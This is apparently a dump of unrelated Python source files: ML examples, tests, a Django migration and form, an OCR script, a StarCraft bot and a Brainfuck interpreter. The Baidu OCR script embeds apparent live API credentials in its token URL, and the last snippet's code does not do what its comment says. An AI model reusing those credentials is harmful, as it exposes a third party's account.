    :param image: a PIL-style image exposing .size and .getpixel((x, y))
    :return: the most frequent pixel value
    """
    counts = defaultdict(int)
    # pixel value -> number of occurrences
    width, height = image.size
    for x in range(width):
        for y in range(height):
            counts[image.getpixel((x, y))] += 1
    most_frequent = max(counts.values())  # highest occurrence count
    # Invert {pixel: count} to look the winner up by its count; on ties this
    # keeps the last pixel inserted, matching the original behavior.
    by_count = {cnt: px for px, cnt in counts.items()}
    return by_count[most_frequent]
def get_bin_table(threshold, rate=0.1):
    """Build a 256-entry grey-level -> binary lookup table.

    Binarization maps every grey level to 0 or 255 so the image becomes
    pure black/white.  Levels within ``rate`` (fractional tolerance) of
    ``threshold`` map to 1 (kept), everything else to 0 (dropped).

    :param threshold: pivot grey level (typically the dominant pixel).
    :param rate: fractional tolerance around the threshold (default 0.1,
                 matching the original hard-coded value).
    :return: list of 256 ints (0 or 1) usable with ``Image.point``.
    """
    # Hoist the band edges out of the loop; the original recomputed them
    # (and re-assigned rate) for every one of the 256 entries.
    low = threshold * (1 - rate)
    high = threshold * (1 + rate)
    return [1 if low <= i <= high else 0 for i in range(256)]
# --- demo: load a captcha-style image and find its dominant grey level -----
image = Image.open('demo.png')  # NOTE(review): assumes demo.png is in the CWD
w, h = image.size
print(w, h)
imgry = image.convert('L')  # 'L' = 8-bit greyscale
max_pixel = get_threshold(imgry)
|
18,359 | 7d7968de7303925dfc130a3c3419c3870ce5d4ab | from paysage import batch
from paysage import layers
from paysage.models import tap_machine
from paysage import fit
from paysage import optimizers
from paysage import backends as be
be.set_seed(137) # for determinism
import example_util as util
def example_mnist_tap_machine(paysage_path=None, num_epochs=10, show_plot=True):
    """Train a two-layer Bernoulli TAP machine on binarized MNIST images.

    Reads minibatches from the shuffled HDF5 store, fits with stochastic
    gradient ascent on the TAP objective, then shows diagnostics.
    """
    num_hidden_units = 256
    batch_size = 100
    learning_rate = 0.1

    (_, _, shuffled_filepath) = util.default_paths(paysage_path)

    # minibatch reader over the binarized training images
    reader = batch.Batch(shuffled_filepath,
                         'train/images',
                         batch_size,
                         transform=batch.binarize_color,
                         train_fraction=0.95)

    # model: Bernoulli visible/hidden layers trained with a 2-term TAP expansion
    visible = layers.BernoulliLayer(reader.ncols)
    hidden = layers.BernoulliLayer(num_hidden_units)
    model = tap_machine.TAP_rbm([visible, hidden], num_persistent_samples=0,
                                tolerance_EMF=1e-4, max_iters_EMF=25, terms=2)
    model.initialize(reader, 'glorot_normal')

    monitor = fit.ProgressMonitor(reader,
                                  metrics=['ReconstructionError',
                                           'EnergyDistance'])

    optimizer = optimizers.Gradient(stepsize=learning_rate,
                                    scheduler=optimizers.PowerLawDecay(0.1),
                                    tolerance=1e-4,
                                    ascent=True)

    trainer = fit.SGD(model, reader, optimizer, num_epochs, method=fit.tap, monitor=monitor)

    print('training with stochastic gradient ascent ')
    trainer.train()

    # diagnostics on the validation split
    util.show_metrics(model, monitor)
    util.show_reconstructions(model, reader.get('validate'), fit, show_plot)
    util.show_fantasy_particles(model, reader.get('validate'), fit, show_plot)
    util.show_weights(model, show_plot)

    # close the HDF5 store
    reader.close()
    print("Done")


if __name__ == "__main__":
    example_mnist_tap_machine(show_plot=True)
|
18,360 | d72aa160fc7678ffc1a8d911f23237e6b54edb1c | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-08 07:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema migration: creates the ``Ponente`` (speaker) table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Ponente',
            fields=[
                # explicit AutoField PK, as emitted by Django's makemigrations
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('nombre', models.CharField(max_length=255)),
                ('apellidos', models.CharField(max_length=255)),
                ('dni', models.CharField(max_length=10)),
                ('email', models.EmailField(max_length=254)),
                ('grados', models.TextField()),
                ('titulos', models.TextField()),
                ('lugares_trabajo', models.TextField()),
            ],
        ),
    ]
|
18,361 | 3f5e78fd4b3bf50831d97fcdf520a5e1565ba8c1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_steve01
----------------------------------
Tests for `steve01` module.
"""
import pytest
from contextlib import contextmanager
from click.testing import CliRunner
from steve01 import steve01
from steve01 import cli
@pytest.fixture
def response():
    """Sample pytest fixture.

    See more at: http://doc.pytest.org/en/latest/fixture.html
    """
    # import requests
    # return requests.get('https://github.com/audreyr/cookiecutter-pypackage')
    assert True


def test_content(response):
    """Sample pytest test function with the pytest fixture as an argument."""
    # from bs4 import BeautifulSoup
    # assert 'GitHub' in BeautifulSoup(response.content).title.string
    assert True


def test_command_line_interface():
    # Drive the click CLI in-process: feed "496" on stdin and check the
    # prompt appears, then verify --help renders the standard epilogue.
    runner = CliRunner()
    result = runner.invoke(cli.main, input="496")
    assert result.exit_code == 0
    assert 'Enter Number' in result.output
    help_result = runner.invoke(cli.main, ['--help'])
    assert help_result.exit_code == 0
    assert '--help Show this message and exit.' in help_result.output
@pytest.mark.parametrize("input,output", [
    (496, [1, 2, 4, 8, 16, 31, 62, 124, 248]),
    (3, [1]),
    (6, [1, 2, 3]),
    (5, [1])
])
def test_can_find_factors(input, output):
    """Proper-divisor lists for perfect and non-perfect numbers."""
    factors = steve01.findFactors(input)
    assert factors == output
@pytest.mark.parametrize("input,output", [
    (6, True),
    (3, False),
    (496, True),
    (495, False),
    (17, False),
    (4, False)
])
def test_is_perfect_number(input, output):
    # NOTE(review): `input` shadows the builtin; renaming it would also
    # require changing the parametrize argnames string above.
    assert steve01.isPerfectNumber(input) == output


@pytest.mark.parametrize("input,factorlist", [
    ('496', '[1, 2, 4, 8, 16, 31, 62, 124, 248]'),
    ('6', '[1, 2, 3]'),
    ('5', '[1]')
])
def test_output_includes_factor_list(input, factorlist):
    # Feed the number on stdin and expect the printed factor list verbatim.
    runner = CliRunner()
    result = runner.invoke(cli.main, input=input)
    assert factorlist in result.output


@pytest.mark.parametrize("input,output", [
    (496, "is perfect"),
    (5, "is not perfect"),
    (6, "is perfect"),
    (25, "is not perfect")
])
def test_output_includes_answer(input, output):
    # The CLI's verdict phrase must appear somewhere in its output.
    runner = CliRunner()
    result = runner.invoke(cli.main, input=str(input))
    assert output in result.output
|
18,362 | d1a5d2f5433bf8d4b89f6fb166998c40fb597bbb | import pytest
@pytest.mark.parametrize("num1,num2,result", [[1, 2, 3], [3, 12, 15], [6, -2, 4], [1.8, 2, 3.8]], ids=["10以内", "10以外", "负数", "小数"])
def test_coculator2(num1, num2, result):
    """Addition sanity check across small/large/negative/float cases.

    Uses math.isclose for the comparison: the original exact ``==``
    happens to pass for 1.8 + 2, but exact float equality is fragile and
    breaks as soon as another decimal case is added.
    """
    from math import isclose
    assert isclose(num1 + num2, result)
|
18,363 | 0ea72e14f308ec8307b1c96a682b77a7b4a77e39 | #!/usr/local/bin/python
print("Goodbye, cruel world.\n")
|
18,364 | 7b1ea9249fcd320007ab562354ddf970c23f5a6e | /Users/swetha/anaconda/lib/python3.6/weakref.py |
18,365 | 02a29b8d0f4a534bc873d2ae3549a6eddadff156 | import os
_proc_status = '/proc/%d/status' % os.getpid()
_scale = {'kB': 1024.0, 'mB': 1024.0*1024.0,
'KB': 1024.0, 'MB': 1024.0*1024.0}
def _VmB(VmKey):
''' given a VmKey string, returns a number of bytes. '''
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except IOError:
return 0.0 # non-Linux?
# get VmKey line e.g. 'VmRSS: 9999 kB\n ...'
i = v.index(VmKey)
v = v[i:].split(None, 3) # split on runs of whitespace
if len(v) < 3:
return 0.0 # invalid format?
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
    """Return virtual memory usage (VmSize) in bytes, minus *since*."""
    return _VmB('VmSize:') - since


def resident(since=0.0):
    """Return resident set size (VmRSS) in bytes, minus *since*."""
    return _VmB('VmRSS:') - since


def stacksize(since=0.0):
    """Return stack size (VmStk) in bytes, minus *since*."""
    return _VmB('VmStk:') - since
|
18,366 | 59c1c61c850ba63ab11bc6627fe7d34153bf22c4 | #! usr/bin/env python
import sys
def main():
    # Trial-division primality demo for n in 2..9 (Python 2 print syntax).
    print 'Prime'
    for n in range(2, 10):
        print 'N= ', n
        for x in range(2, n):
            print 'X= ', x
            if n % x == 0:
                print n, 'NOT PRIME'
                break
        else:
            # NOTE(review): reconstructed as for/else (runs only when no
            # divisor was found) -- confirm against original indentation.
            print n, 'PRIME NUMBER'


if __name__ == '__main__':
    main()
|
18,367 | a83a5ebdc059c8c0ea5b3fcb5f38703f331c89f6 | import json
from sc2 import run_game, maps, Race, Difficulty
from sc2.player import Bot, Computer
from bot import MyBot
def main():
    """Launch one bot-vs-computer SC2 match and save the replay."""
    # the bot's race is declared in its metadata file
    with open("botinfo.json") as f:
        bot_info = json.load(f)

    bot_race = Race[bot_info["race"]]

    run_game(maps.get("Abyssal Reef LE"), [
        Bot(bot_race, MyBot()),
        Computer(Race.Random, Difficulty.Medium)
    ], realtime=False, step_time_limit=2.0, game_time_limit=(60*20), save_replay_as="test.SC2Replay")


if __name__ == '__main__':
    main()
|
18,368 | 1016d6b07e4c269a573efcbd4bfaa4d22701de47 | from PyQt5.QtWidgets import QWidget
from PyQt5.QtGui import QPainter, QImage
import os
class MYImage(QWidget):
    """Widget that paints a QImage (loaded from *img_path*) over its area."""

    def __init__(self, img_path=None, parent=None):
        super(MYImage, self).__init__()
        self.__init_Attributes()
        self.__init_Parameters(img_path, parent)

    # inits
    def __init_Attributes(self):
        # defaults; __height/__width look reserved for future sizing logic
        self.__height = 128
        self.__width = 128
        self.__image = QImage()
        self.__path = ''

    def __init_Parameters(self, img_path, parent):
        self.setImagePath(img_path)
        if parent:
            self.setParent(parent)

    # EVENTS
    def paintEvent(self, event):
        """Stretch the current image over the widget's exposed rectangle."""
        painter = QPainter()
        rect = event.rect()
        painter.begin(self)
        painter.setRenderHint(painter.HighQualityAntialiasing)
        painter.drawImage(rect, self.__image)
        painter.end()

    # PROPERTY
    def imagePath(self):
        """Return the path of the currently loaded image ('' when none)."""
        return self.__path

    # METHODS
    def setImagePath(self, path):
        """Load *path* into the widget if it names an existing file.

        None, empty, and non-existent paths are ignored explicitly.  The
        original wrapped the lookup in a bare ``except: pass``, which also
        swallowed genuine programming errors.
        """
        if path and os.path.exists(path):
            self.__path = path
            self.__image = QImage(self.__path)
pass
if __name__ == '__main__':
    import sys
    from PyQt5.QtWidgets import QApplication

    app = QApplication([])
    # NOTE(review): hard-coded absolute path -- only works on the author's machine
    win = MYImage(img_path='C:/Users/Edward/Desktop/Develop/Projects/CGPM/Resources/Icons/Dialogs/error.png')
    win.show()
    sys.exit(app.exec_())
|
18,369 | f7ff5db54298d29526e1454eb66b05c24ec55452 | import time
import numpy as np
from src.main.utils.plotter import plot_on_one_errorbars, get_color, histogram_bars_grouped
def gen_plots_with_errbars(plots_desc, compared, range_val, func, repeat=3, save_figs=False, verbose=False):
    """
    Generate series of figures with multiple plots on one piece with error bars.
    :param plots_desc: description of a plots
        Example:
            [
                {'key': 'time', 'name': 'Time vs k neighours', 'xlabel': 'k', 'ylabel': 't [s]'},
                {'key': 'prec', 'name': 'Prec vs k neighours', 'xlabel': 'k', 'ylabel': 't [s]'}
            ]
    :param compared: array of objects which we compare across others, has to contain name
        Example:
            [
                { 'model': Foo, 'name': 'Foo'},
                { 'model': Bar, 'name': 'Bar'}
            ]
    :param range_val: range of values which are our x values in a chart
    :param func: function which describe our logic. To the function 3 args are passed:
        sink - which is a dict with specified keys in plot_desc and corresponding list for a values
        compared - object from compared array
        j - which is a a value from specified range_val
        Example:
            def func(sink, model_desc, k):
                model_class = model_desc['model']
                model = model_class(a=k)
                start = time.time()
                model.do()
                end_time = time.time() - start
                sink['time'].append(end_time)
                r = model.get()
                sink['prec'].append(r)
    :param repeat: specyfy how many times repeat our function
    :param save_figs: True is you want to save plots to the filesystem
    :return: void
    """
    # {key: {'y': [...], 'err': [...]}} accumulators, one entry per plot desc
    def _init_y_avg():
        y_val = dict()
        for desc in plots_desc:
            y_val[desc['key']] = {'y': list(), 'err': list()}
        return y_val

    # {key: []} sink handed to `func` for one repeat batch
    def _init_list():
        y_val = dict()
        for desc in plots_desc:
            y_val[desc['key']] = list()
        return y_val

    # fold one repeat batch into mean/std per plot key
    def _calc_avg(y_val, y_avg):
        for desc in plots_desc:
            key = desc['key']
            y_avg[key]['y'].append(np.mean(y_val[key]))
            y_avg[key]['err'].append(np.std(y_val[key]))

    # append one compared case's series (x, y, label, style, err) per plot key
    def _add_avg_to_data(index, data_lists, y_avg, case_name):
        for desc in plots_desc:
            key = desc['key']
            data_lists[key].extend([range_val, y_avg[key]['y'], case_name, get_color(index) + '-', y_avg[key]['err']])

    def _plot_data_lists(data_lists):
        for desc in plots_desc:
            key = desc['key']
            plot_on_one_errorbars(desc['name'], desc['xlabel'], desc['ylabel'],
                                  data_lists[key], only_ints_on_x=True, save_it=save_figs)

    def _print_after_process(j_value, y_avg):
        print('>>> results for value {}: '.format(j_value))
        for desc in plots_desc:
            key = desc['key']
            print(' >>> {} - y: {}, err: {}'.format(key, y_avg[key]['y'][-1], y_avg[key]['err'][-1]))

    data_lists = _init_list()
    for i, compared_obj in enumerate(compared):
        case_name = compared_obj['name']
        y_avg = _init_y_avg()
        if verbose:
            print('({}) started calculation for {} case'.format(i, case_name))
        for j in range_val:
            y_val = _init_list()
            for _ in range(repeat):
                func(y_val, compared_obj, j)
            _calc_avg(y_val, y_avg)
            if verbose:
                _print_after_process(j, y_avg)
        # NOTE(review): reconstructed as per-case (after the j loop) -- confirm
        _add_avg_to_data(i, data_lists, y_avg, case_name)
    _plot_data_lists(data_lists)
def gen_grouped_histogram_bars(plots_desc, compared, range_val, func, repeat=3, save_figs=False, verbose=False,
                               bar_width=0.2, show_bar_values=True, figsize=None, legend_loc=0, show_legend=True):
    """Grouped-bar variant of gen_plots_with_errbars.

    Same plots_desc / compared / range_val / func contract; results are
    rendered as one grouped bar chart per plot key, with one bar group per
    compared case and one bar per range value.
    """
    # {key: [[] per range value]} -- one bucket per x value, filled per case
    def _init_data():
        d = dict()
        for desc in plots_desc:
            d[desc['key']] = list()
            for i in range(len(range_val)):
                d[desc['key']].append([])
        return d

    # {key: []} sink handed to `func` for one repeat batch
    def _init_list():
        y_val = dict()
        for desc in plots_desc:
            y_val[desc['key']] = list()
        return y_val

    # fold one repeat batch into a mean appended to the val_ind bucket
    def _calc_avg(y_val, data_lists, val_ind):
        for desc in plots_desc:
            key = desc['key']
            data_lists[key][val_ind].append(np.mean(y_val[key]))

    def _plot_data_lists(data_lists):
        xlabels = []
        for c in compared:
            xlabels.append(c['name'])
        for desc in plots_desc:
            key = desc['key']
            histogram_bars_grouped(data_lists[key], xlabels, bar_labels=range_val,
                                   ylabel=desc['ylabel'], xlabel=desc['xlabel'], title=desc['name'],
                                   bar_width=bar_width, show_bar_values=show_bar_values, figsize=figsize,
                                   save_fig=save_figs, legend_loc=legend_loc, show_legend=show_legend)

    def _print_after_process(j_value, j_idx, data_lists):
        print('>>> results for value {}: '.format(j_value))
        for desc in plots_desc:
            key = desc['key']
            print(' >>> {} - y: {}'.format(key, data_lists[key][j_idx][-1]))

    data_lists = _init_data()
    for i, compared_obj in enumerate(compared):
        case_name = compared_obj['name']
        if verbose:
            print('({}) started calculation for {} case'.format(i, case_name))
        for j, val in enumerate(range_val):
            y_val = _init_list()
            for _ in range(repeat):
                func(y_val, compared_obj, val)
            _calc_avg(y_val, data_lists, j)
            if verbose:
                _print_after_process(val, j, data_lists)
    _plot_data_lists(data_lists)
def measure_time(func, sink_list):
    """Call *func*, append its elapsed wall time (seconds) to *sink_list*,
    and return *func*'s result.

    Uses time.perf_counter(), the recommended monotonic clock for interval
    timing -- time.time() can jump backwards under NTP adjustment, which
    would record a negative duration.
    """
    start = time.perf_counter()
    result = func()
    sink_list.append(time.perf_counter() - start)
    return result
|
18,370 | 25925fc345d002b741a1bbeb96eb5ba94ac717e3 | import json
import base64
import requests
import urllib
import os
import glob
#图片转文字 程序 主要调用百度 AI 项目接口实现
# Image-to-text script backed by the Baidu AI OCR HTTP API.
# 1. gather the image files
file_path = r'g:\imgs'
pic_list = []
# assemble the ordered list of captures: images_0.png .. images_17.png
for i in range(18):
    pic_list.append('images_' + str(i) + '.png')
# alternative: pick up every jpg in the folder instead
#for imgfile in sorted(glob.glob(file_path + "\*.jpg")):
#    pic_list.append(imgfile)
print(pic_list)

# recognised text is appended here
result_file = os.path.join(file_path, 'temp.txt')

# 2. fetch the access token ONCE -- it is valid for every request below.
# (The original re-requested a token for every single image.)
# NOTE(review): API credentials are committed in source; move them to config.
get_token = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&' \
            'client_id=L8DSGvCxigKvQxYGGR5b6OUn&client_secret=PnLBBvgV71A12NMSEG2PECbhTFxOpmNl'
# general-purpose OCR endpoint
API_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic/?access_token='
# handwriting OCR
#API_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/handwriting/?access_token='
# high-accuracy OCR
#API_url= 'https://aip.baidubce.com/rest/2.0/ocr/v1/accurate_basic/?access_token='
headers = {"Content-Type": "application/x-www-form-urlencoded"}
text = requests.get(get_token).text
access_token = json.loads(text)['access_token']
url = API_url + access_token

for file in pic_list:
    file_name = os.path.join(file_path, file)
    # read the image and base64-encode it as the API requires
    with open(file_name, 'rb') as f:
        pic1 = f.read()
    data = dict()
    data['languagetype'] = "CHN_ENG"  # recognise mixed Chinese/English text
    data['image'] = str(base64.b64encode(pic1), 'utf-8')
    decoded_data = urllib.parse.urlencode(data)

    # 3. POST the image and append the recognised lines to the result file
    response = requests.post(url, data=decoded_data, headers=headers)
    words_result = json.loads(response.text)['words_result']
    # 'a' mode so successive images accumulate; with-statement closes the
    # handle even if a response is malformed (the original leaked it then)
    with open(result_file, 'a') as temp_file:
        for words in words_result:
            temp_file.writelines(words['words'] + '\n')
18,371 | 63a447fcb4783dc9d4f4badc1d2e1be01980e6f5 | #Using try-except block
def dic(words):
    """Count occurrences of each item in *words* (EAFP try/except style)."""
    a = {}
    for i in words:
        try:
            a[i] += 1
        except KeyError:  ## the famous pythonic way:
            a[i] = 1      ## Halt and catch fire
    return a

# >>> a='1,3,2,4,5,3,2,1,4,3,2'.split(',')
# >>> a
# ['1', '3', '2', '4', '5', '3', '2', '1', '4', '3', '2']
# >>> dic(a)
# {'1': 2, '3': 3, '2': 3, '5': 1, '4': 2}
# Without using a try-except block
def dic(words):
    """Count occurrences of each item in *words* via dict.get."""
    tally = {}
    for word in words:
        tally[word] = tally.get(word, 0) + 1
    return tally

# >>> a
# ['1', '3', '2', '4', '5', '3', '2', '1', '4', '3', '2']
# >>> dic(a)
# {'1': 2, '3': 3, '2': 3, '5': 1, '4': 2}
|
18,372 | e871b4dfe89f6a942900021e949b2c1e46bfe98c | #-*-coding: utf-8-*-
import sys
# Minimal Brainfuck interpreter; the program file is given as argv[1].
# with-statement closes the source file (the original leaked the handle).
with open(sys.argv[1], "r") as src:
    program = src.read()

pc = 0        # program counter into `program`
cells = [0]   # tape, grown on demand by '>'
ptr = 0       # data pointer into `cells`

while pc < len(program):
    op = program[pc]
    if op == ">":
        ptr += 1
        if len(cells) <= ptr:
            cells.append(0)
    elif op == "<":
        ptr -= 1
        if ptr < 0:
            print("Error: Out of Limit")
            sys.exit(0)
    elif op == "+":
        cells[ptr] += 1
        # 8-bit wrap: 255 + 1 -> 0.  BUG FIX: the original wrapped when the
        # cell *reached* 255, which made the value 255 unreachable.
        if cells[ptr] > 255:
            cells[ptr] = 0
    elif op == "-":
        cells[ptr] -= 1
        if cells[ptr] < 0:
            cells[ptr] = 255
    elif op == ".":
        print(chr(cells[ptr]), end="")
    elif op == ",":
        inp = input("Input requested: ")
        cells[ptr] = ord(inp[0])
    elif op == "[":
        # current cell zero: skip forward past the MATCHING ']'
        if cells[ptr] == 0:
            depth = 0
            pc += 1
            while pc < len(program):
                if program[pc] == "]" and depth == 0:
                    break
                elif program[pc] == "[":
                    depth += 1
                elif program[pc] == "]":
                    depth -= 1
                pc += 1
    elif op == "]":
        # current cell non-zero: jump back to the MATCHING '['
        if cells[ptr] != 0:
            depth = 0
            pc -= 1
            while pc >= 0:
                if program[pc] == "[" and depth == 0:
                    break
                elif program[pc] == "]":
                    depth += 1
                elif program[pc] == "[":
                    depth -= 1
                pc -= 1
    pc += 1
print("")
18,373 | 89ab1859b6d7707be7b041a86ef5ba82d4bb4547 | import time
import math
import os
import cv2
import dlib
import datetime as dt
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
# Import datasets, classifiers and performance metrics
from sklearn import svm, metrics
from sklearn.utils import shuffle
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer, accuracy_score
from sklearn.linear_model import LogisticRegression
# setting user chosen vars
images_dir = '../new_dataset'
labels_filename = 'attribute_list.csv'
# user choses grey scale or not, 0 for yes, 1 for no (cv2.imread flag)
grey_scale = 1
##################
# list of emotions, you can reduce this to see how your accuracy varies
emotions = ["smile", "no_smile"]
# dlib frontal-face detector + 68-point landmark predictor (pre-trained model)
detect_obj = dlib.get_frontal_face_detector()
predict_obj = dlib.shape_predictor("../preprocessing/models/shape_predictor_68_face_landmarks.dat")
##################
# final feature enhance obtain_landmarks function
def obtain_landmarks(frame):
    '''
    https://www.pyimagesearch.com/2017/04/03/facial-landmarks-dlib-opencv-python/
    returns array of new features found for face

    Returns a flat list [x_c, y_c, dist, angle, ...] per landmark, or False
    when no face is detected.  NOTE(review): if several faces are detected,
    only the LAST face's vector survives the loop and is returned.
    '''
    detections = detect_obj(frame, 1)
    # For each face detected in given frame
    for k, dots in enumerate(detections):
        # Get landmark coords in image
        shape = predict_obj(frame, dots)
        xlist = []
        ylist = []
        # Store x and y coordinates in respective lists (landmarks 1..67)
        for i in range(1, 68):
            xlist.append(float(shape.part(i).x))
            ylist.append(float(shape.part(i).y))
        # get means of dots to obtain center of gravity
        xmean = np.mean(xlist)
        ymean = np.mean(ylist)
        # get the distance wrt dots
        xcentral = [(x - xmean) for x in xlist]
        ycentral = [(y - ymean) for y in ylist]
        # divide by zero catch, these dots correspond to that of the nosebone and top right midpoint of eyebrow (29 -> mid nose, 26 -> mid-eyebrow)
        if xlist[26] == xlist[29]:
            noseangle = 0
        else:
            noseangle = int(math.atan((ylist[26] - ylist[29]) / (xlist[26] - xlist[29])) * 180 / math.pi)
        # getting offset for nosebone tilt so that nosebone is vertical in image
        if noseangle < 0:
            noseangle += 90
        else:
            noseangle -= 90
        # setting up the landmark vectors
        landmarks_vector = []
        for x, y, w, z in zip(xcentral, ycentral, xlist, ylist):
            landmarks_vector.append(x)
            landmarks_vector.append(y)
            # calculate eucledian distance between point and centre of gravity
            mean_eu = np.asarray((ymean, xmean))
            coor_eu = np.asarray((z, w))
            distance = np.linalg.norm(coor_eu - mean_eu)
            # tilted image nosebone based correction, we tilt the point so that the nose bone alignes with the vertical
            # NOTE(review): noseangle is computed but no longer applied here
            relative_angle = (math.atan2(y, x) * 360) / (2 * math.pi)  # (math.atan((z-ymean)/(w-xmean))*180/math.pi) - noseangle
            landmarks_vector.append(distance)
            landmarks_vector.append(relative_angle)
    # error handling if no faces detected
    if len(detections) < 1:
        return False
    else:
        return landmarks_vector
def pull_dataset():
    '''
    Pulls the full dataset (without outliers)
    Used as a helper function to obtain full dataset that will be then split to user
    desired train/validation/test(inference) sets.

    Returns (full_dataset, full_labels, lost_features): landmark feature
    matrix, matching label array, and filenames where no face was found.
    '''
    # lists keep the order
    full_dataset = []
    full_labels = []
    lost_features = []
    # collect labels
    df = pd.read_csv(labels_filename, skiprows=1, index_col='file_name')
    newdf = df[df.columns[1]]
    # collect pre-processed images and sort them to labels
    for (root, dirs, dat_files) in os.walk('{0}'.format(images_dir)):
        print('starting gatherer')
        for file in dat_files:
            # image grayscaling at import
            img = cv2.imread('{0}/{1}'.format(images_dir, file), grey_scale)
            # image equalisation (to be added by user if equalisation is esteemed to be useful)
            features = obtain_landmarks(img)
            if features is False:
                lost_features.append(file)
            else:
                full_dataset.append(features)
                # NOTE(review): assumes filenames look like '<int>.<3-char ext>'
                full_labels.append(int(file[:-4]))
    # only select rows of interest (none outliers) and only keep 'smiling' feature to be evaluated
    full_labels = newdf.loc[full_labels]
    full_labels = full_labels.values.tolist()
    # numpy array conversion
    full_dataset = np.array(full_dataset)
    full_labels = np.array(full_labels)
    return full_dataset, full_labels, lost_features
# RUNNING CODE
full_dataset, full_labels, lost_features = pull_dataset()
print('Sanity Check')
print('full dataset of shape:', full_dataset.shape)
print('full labels of shape:', full_labels.shape)
print('TOTAL NUMBER OF FACES NOT DETECTED WITH OUR LANDMARKS DETECTOR (IN-BUILT, pre-trained model): {0}'.format(len(lost_features)))

# # creating classifier object as an SVM (support vector machine) probabilistic model, you can change this to any other type of classifier
# classifier = SVC(kernel='linear', probability=True, tol=1e-3)

# Reshuffling data (for extra randomness)
X_data, Y_data = shuffle(full_dataset, full_labels, random_state=0)
print('X_data of shape:', X_data.shape)
print('Y_data of shape:', Y_data.shape)

# perform train and test split (random state set to 1 to ensure same distribution accross different sets)
# this split is obviously case specific! but cross validation allows us to avoid over-fitting so lets make sure we have a validation set ready.
# Since the dataset is not extrememly large i'll be using a 60/20/20 split, meaning more or less 1000 validation and test examples and 3000 training examples, to be tested: 75/10/15
# in this case we are a little less concerned since we are evaluating smiles which are present in every case, unlike glasses
X_train, X_test, y_train, y_test = train_test_split(X_data, Y_data, test_size=0.2, random_state=1)
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.2, random_state=1)

# sanity check
print('X_train of shape:', X_train.shape)
print('y_train of shape:', y_train.shape)
print('X_val of shape:', X_val.shape)
print('y_val of shape:', y_val.shape)
print('X_test of shape:', X_test.shape)
print('y_test of shape:', y_test.shape)

# creating dummy LR classifier for hyperparameterization
classifier = LogisticRegression(penalty='l2', random_state=0, multi_class='auto', max_iter=15000, n_jobs=5)
n_folds = 10
# choosing different parameter combinations to try
param_grid = {'C': [0.01, 0.1, 1],
              'solver': ['lbfgs', 'sag'],
              }
# type of scoring used to compare parameter combinations
acc_scorer = make_scorer(accuracy_score)
# run grid search
# NOTE(review): the grid search is fit on the VALIDATION split only, not the
# training split -- unusual; confirm this was intentional.
start_time = dt.datetime.now()
print('Start grid search at {}'.format(str(start_time)))
grid_search = GridSearchCV(classifier, param_grid, cv=n_folds, scoring=acc_scorer, n_jobs=4)
grid_obj = grid_search.fit(X_val, y_val)
# get grid search results
print(grid_obj.cv_results_)
# set the best classifier found for rbf
clf = grid_obj.best_estimator_
print(clf)
end_time = dt.datetime.now()
print('Stop grid search {}'.format(str(end_time)))
elapsed_time = end_time - start_time
print('Elapsed grid search time {}'.format(str(elapsed_time)))

# fit the best alg to the training data
start_time = dt.datetime.now()
print('Start learning with best params at {}'.format(str(start_time)))
clf.fit(X_train, y_train)
end_time = dt.datetime.now()
print('Stop learning {}'.format(str(end_time)))
elapsed_time = end_time - start_time
print('Elapsed learning time {}'.format(str(elapsed_time)))

# predict using test set
predictions = clf.predict(X_test)
print(accuracy_score(y_test, predictions))
# Now predict the value of the test
expected = y_test
print("Classification report for classifier %s:\n%s\n"
      % (clf, metrics.classification_report(expected, predictions)))
cm = metrics.confusion_matrix(expected, predictions)
print("Confusion matrix:\n%s" % cm)
# plot_confusion_matrix(cm)
print("Accuracy={}".format(metrics.accuracy_score(expected, predictions)))
18,374 | afe3e72908133fc66f163981b9ce66751cd1ae26 | from django import forms
from register.models import Group
from django.utils import timezone
class RegisterForm(forms.ModelForm):
    """Sign-up form for a ``Group``; hides the system-managed fields."""

    required_css_class = 'required'

    class Meta:
        model = Group
        fields = '__all__'
        exclude = ['gid', 'final_song', 'pay_status']

    def __init__(self, *args, **kwargs):
        super(RegisterForm, self).__init__(*args, **kwargs)
        # widget tweaks: semantic-ui dropdown + helpful placeholders
        self.fields['category'].widget.attrs.update({
            'class': 'ui dropdown',
        })
        self.fields['group_name'].widget.attrs.update({
            'placeholder': '有團名的話,請告訴我們哦'
        })
        self.fields['cellphone'].widget.attrs.update({
            'placeholder': '0987654321'
        })

    def clean_cid(self):
        # BUG FIX: the original body was `pass` followed by `return cid`,
        # which raised NameError whenever Django invoked this cleaner.
        # Return the submitted value unchanged until real validation exists.
        return self.cleaned_data.get('cid')

    def save(self, commit=True):
        """Persist the group; with commit=False the caller saves it later."""
        user = super(RegisterForm, self).save(commit=False)
        if commit:
            user.save()
        return user
|
18,375 | 7b3c7ae78ec8b38d761037821aad2def0c99ee3f | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 28 18:25:42 2021
@author: win10
"""
from collections import Counter

list1 = ["beter", "matt", "beter",
         "matt", "beter", "harry",
         "beter", "beter", "matt",
         "beter", "harry", "harry",
         "axel", "matt", "beter", "harry",
         "beter", "beter", "matt", "beter",
         "harry", "beter", "matt", "beter", "harry"]

# Keep the names that make up at least 5% of all entries.
# Counter replaces the original de-duplication loop plus a list1.count()
# call per unique name (O(n^2)); dict insertion order preserves the
# first-appearance order the original produced.
total = len(list1)
list3 = [name for name, occurrences in Counter(list1).items()
         if (occurrences / total) * 100 >= 5]
print(list3)
# For each of `num` input lines, print the even-indexed characters, a space,
# then the odd-indexed characters.
num = int(input())
for _ in range(num):
    line = input()
    # BUG FIX: the original used str1.index(ch), which returns the FIRST
    # occurrence of ch -- any line with repeated characters was split
    # incorrectly.  enumerate() gives each character's true position.
    for idx, ch in enumerate(line):
        if idx % 2 == 0:
            print(ch, end="")
    print(" ", end="")
